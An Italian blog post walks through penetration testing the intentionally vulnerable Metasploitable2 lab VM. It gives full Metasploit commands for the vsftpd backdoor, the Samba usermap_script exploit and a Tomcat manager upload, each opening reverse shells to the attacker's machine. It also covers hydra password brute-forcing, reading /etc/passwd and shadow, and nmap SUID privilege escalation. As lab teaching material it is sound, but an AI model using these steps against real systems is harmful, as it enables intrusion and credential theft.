mercoledì 5 novembre 2025

Penetration Test Metasploitable 2


 

AVVISO LEGALE

Metasploitable2 deve essere usato solo in ambienti di laboratorio, su reti isolate e personali. È una macchina vulnerabile per uso didattico. Usarla su reti pubbliche o di produzione è illegale.


Requisiti

  • Una macchina con Kali Linux o simile (con Metasploit Framework)

  • Metasploitable2 installata su una VM (es. VirtualBox o VMware)

  • Rete impostata in modalità host-only o NAT con accesso interno


Ricognizione (Scanning)

Scopri l’indirizzo IP della macchina target:

netdiscover -r 192.168.56.0/24

Oppure:

arp-scan --localnet

Scansione delle porte:

nmap -sS -sV -O 192.168.56.X

Analizza i servizi attivi. Metasploitable2 espone molte porte vulnerabili, tra cui:

  • FTP (21)

  • SSH (22)

  • Telnet (23)

  • HTTP (80, 8180)

  • Samba (445)

  • MySQL (3306)

  • Tomcat (8180)

  • e tanti altri


Analisi delle vulnerabilità

Puoi usare Nmap con script NSE:

nmap -sV --script=vuln 192.168.56.X

Oppure uno scanner come Nikto per HTTP:

nikto -h http://192.168.56.X

Sfruttamento (Exploitation)

Esempio: vsftpd 2.3.4 Backdoor (porta 21)

msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set RHOST 192.168.56.X run

Esempio: Samba Remote Code Execution (porta 445)

use exploit/multi/samba/usermap_script set RHOST 192.168.56.X set PAYLOAD cmd/unix/reverse set LHOST <tuo IP> run

Post-Exploitation

Dopo aver ottenuto l’accesso:

  • Escalation dei privilegi

  • Raccolta di credenziali (/etc/passwd, history, shadow, etc.)

  • Accesso ad altri servizi (pivoting)


Report

Documenta ogni fase:

  • Comandi usati

  • Servizi vulnerabili trovati

  • Exploit usati

  • Accessi ottenuti



Ora vediamo un test completo!

Scopri l’indirizzo IP di Metasploitable2

netdiscover -r 192.168.56.0/24

oppure:

nmap -sn 192.168.56.0/24

Supponiamo l'IP della vittima sia 192.168.56.101.


Conferma che Samba è attivo

nmap -p 139,445 -sV 192.168.56.101

Output atteso:

PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.x (workgroup: WORKGROUP)

Attacco con Metasploit

Avvia Metasploit:

msfconsole

Carica l'exploit:

use exploit/multi/samba/usermap_script

Imposta i parametri:

set RHOSTS 192.168.56.101 set PAYLOAD cmd/unix/reverse set LHOST 192.168.56.1 # ← cambia con l'IP della tua macchina Kali

Controlla che tutto sia impostato:

show options

Avvia l’exploit:

run

Shell ottenuta!

Se tutto è andato bene, vedrai una shell remota tipo questa:

[*] Command shell session 1 opened

Puoi ora eseguire comandi sulla macchina Metasploitable2, es.:

uname -a id whoami

Pulizia e report

  • Prendi nota dei comandi eseguiti

  • Salva l’output per il tuo report

  • Esci dalla sessione con exit


Vediamo come sfruttare Apache Tomcat su Metasploitable2

Verifica Tomcat attivo

nmap -p 8180 --script http-title 192.168.56.101

Oppure:
Apri il browser:
👉 http://192.168.56.101:8180

Dovresti vedere una schermata di Tomcat.


Trovare le credenziali di default

Metasploitable2 ha spesso queste credenziali predefinite per Tomcat Manager:

Username: tomcat Password: tomcat

Puoi confermarlo con:

hydra -l tomcat -P /usr/share/wordlists/rockyou.txt 192.168.56.101 http-get /manager/html

Exploit con Metasploit

Avvia Metasploit

msfconsole

Carica l’exploit:

use exploit/multi/http/tomcat_mgr_upload

Imposta i parametri:

set RHOSTS 192.168.56.101 set RPORT 8180 set HTTPUSERNAME tomcat set HTTPPASSWORD tomcat set TARGETURI /manager/html set PAYLOAD java/shell_reverse_tcp set LHOST 192.168.56.1 # ← IP della tua Kali

Controlla:

show options

Esegui l’exploit:

run

Shell ottenuta!

Se tutto funziona, otterrai una shell di tipo:

[*] Command shell session X opened

Esegui comandi per verificarlo:

whoami uname -a

Post Exploitation

Una volta dentro:

  • Esplora i file (cd, ls, cat)

  • Cerca credenziali (find / -name *.properties, cat /etc/passwd)

  • Puoi usare meterpreter se vuoi un’interfaccia più avanzata

Per eseguire un'escalation dei privilegi su Metasploitable2 dopo aver ottenuto l'accesso tramite Apache Tomcat (porta 8180), puoi sfruttare una vulnerabilità nei binaries con SUID.

Identifica i binari con SUID

Dopo aver ottenuto una shell sul sistema, cerca i file con il bit SUID impostato:

find / -perm -4000 -type f 2>/dev/null

Questi file possono essere utilizzati per ottenere privilegi elevati.


Sfrutta un binario vulnerabile

Supponiamo di trovare un binario vulnerabile come nmap con SUID impostato. Puoi tentare di eseguire un attacco di privilege escalation:

nmap --interactive

Una volta dentro l'interfaccia interattiva di nmap, prova a eseguire comandi come:

!sh

Questo comando tenta di avviare una shell con privilegi elevati.


Nota

L'efficacia di questa tecnica dipende dalla configurazione specifica del sistema e dalla presenza di binari vulnerabili. Se questa tecnica non funziona, potrebbero esserci altre vulnerabilità locali da esplorare.



Nessun commento:

Posta un commento

ACL (Access Control List). Cosa sono?

What is an IP Access Control List (ACL)? Access Control Lists (ACLs) are one of the most powerful tools in networking for traffic filtering...